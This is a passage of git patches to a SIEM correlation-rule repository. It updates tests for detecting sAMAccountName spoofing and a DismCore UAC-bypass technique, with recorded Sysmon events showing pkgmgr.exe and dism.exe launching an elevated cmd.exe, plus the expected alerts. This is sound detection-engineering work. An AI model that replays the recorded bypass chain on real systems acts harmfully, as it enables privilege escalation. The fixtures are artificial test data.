"microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4768_A_Kerberos_authentication_ticket_was_requested", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4768", "normalized": true, "object": "system", "reason": "0x0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T19:42:21.025Z", "src.host": "172.16.66.19", "src.ip": "172.16.66.19", "src.port": 50615, "status": "success", "subject": "account", "subject.account.domain": "threebeesco.com", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-220105", "subject.account.name": "dc012", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2021-12-12T17:57:52.573Z", "type": "raw", "uuid": "f90c9558-8be7-4424-947a-d9822a7045ee"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "172.16.66.19", "alert.key": "lgrove -> dc012$", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Exploitation for Privilege Escalation", "correlation_name": "sAMAccountName_Spoofing", "correlation_type": "incident", "event_src.category": "Directory service", "event_src.host": "dc012.threebeesco.com", "event_src.hostname": "dc012", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "sAMAccountName_Spoofing|dc012.threebeesco.com|s-1-5-21-308926384-506822093-3341789130-101606", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "logon_service": "krbtgt", "object": "account", "object.account.domain": "3b", "object.account.id": "S-1-5-21-308926384-506822093-3341789130-220105", "object.account.name": "dc012", "src.host": "172.16.66.19", "src.ip": "172.16.66.19", "src.port": 50615, "status": "success", "subject": "account", "subject.account.domain": "3b", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-101606", "subject.account.name": "lgrove", "subject.account.session_id": "7572729"} From ea3438ad18bdc865a411cbcda3e1e15faa4e39a0 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 10:53:18 +0300 Subject: [PATCH 52/57] =?UTF-8?q?=D0=A3=D0=B4=D0=B0=D0=BB=D0=B8=D0=BB=20?= =?UTF-8?q?=D0=BF=D0=BE=D0=B2=D1=82=D0=BE=D1=80=D1=8F=D1=8E=D1=89=D0=B8?= =?UTF-8?q?=D0=B5=D1=81=D1=8F=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B,=20=D1=80=D0=B0?= =?UTF-8?q?=D1=81=D1=88=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F?= =?UTF-8?q?=20=D0=B4=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82?= =?UTF-8?q?=D0=BE=D1=80=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8?= =?UTF-8?q?=D0=B4=D0=B0=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80?= =?UTF-8?q?=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(UACME=5F23=5FDismCore=5FHijac?= =?UTF-8?q?king)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../UACME_23_DismCore_Hijacking/tests/test_1.sc | 7 ++++--- .../UACME_23_DismCore_Hijacking/tests/test_2.sc | 6 ------ .../UACME_23_DismCore_Hijacking/tests/test_3.sc | 4 ---- .../UACME_23_DismCore_Hijacking/tests/test_4.sc | 4 ---- .../UACME_23_DismCore_Hijacking/tests/test_5.sc | 4 ---- .../UACME_23_DismCore_Hijacking/tests/test_6.sc | 4 ---- .../UACME_23_DismCore_Hijacking/tests/test_7.sc | 4 ---- 7 files changed, 4 insertions(+), 29 deletions(-) delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_2.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_3.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_4.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_5.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_6.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_7.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_1.sc index 9bb9e284..bd6fcc49 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_1.sc @@ -1,4 +1,5 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T04:51:37.380Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "3ffc7872-284a-4a9f-8924-9728c9593f41"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T04:51:37.380Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "bcd20b7c-a108-430b-80de-241cbf0bed6b"} -expect 1 {"correlation_name": "UACME_23_DismCore_Hijacking"} +expect 1 {"action": "escalate", "category.generic": "Attack", "category.high": "Privilege Escalation", "category.low": "Bypass User Account Control", "correlation_name": "UACME_23_DismCore_Hijacking", "correlation_type": "incident", "datafield1": "cmd.exe ← dism.exe ← pkgmgr.exe", "datafield2": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "event_src.category": "Other", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "UACME_23_DismCore_Hijacking|msedgewin10|\"C:\\Windows\\system32\\cmd.exe\"", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.id": "5756", 